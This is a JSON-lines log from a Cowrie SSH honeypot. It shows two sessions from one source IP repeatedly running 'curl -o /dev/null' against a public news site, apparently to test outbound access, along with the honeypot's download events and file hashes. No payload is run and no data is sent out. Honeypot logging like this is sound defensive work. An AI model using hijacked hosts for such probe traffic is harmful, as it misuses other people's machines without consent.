{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.050980Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.088263Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.089948Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.092905Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.093879Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.126087Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.127548Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.129848Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.131022Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.155723Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.156770Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.167111Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.168012Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.169491Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.170832Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.173373Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.198841Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.199979Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.290122Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.291754Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.293751Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.295671Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.298379Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.299293Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.308605Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.330563Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.337775Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.338939Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.341876Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.342804Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.382955Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.392866Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.394080Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.397610Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.399877Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.401576Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.442346Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.443626Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.445310Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.447308Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.448215Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.460518Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.488051Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.489491Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.493078Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.494350Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.522625Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.525013Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.531250Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.532665Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.534385Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.535392Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.556421Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.573153Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.596078Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.623657Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.624660Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.626698Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.627892Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.654049Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.663915Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.665106Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.667110Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.667903Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.678799Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.701086Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.702572Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.703852Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.717448Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.735861Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.761090Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.763617Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.783016Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.784058Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.814916Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.833633Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.835027Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.858680Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.860487Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.863749Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.865155Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.884001Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.885035Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.904521Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.905931Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.928514Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.929766Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.937091Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.938709Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.953575Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.955384Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.979719Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.980981Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:14.987517Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:14.990732Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.000204Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.002037Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.031252Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.032448Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.040245Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.041375Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.045402Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.048182Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.091522Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.092708Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.094511Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.096628Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.098457Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.100647Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.129325Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.148992Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.155911Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.157109Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.160360Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.161521Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.169300Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.189659Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.211216Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.216730Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.218012Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.221767Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.222691Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.230975Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.253483Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
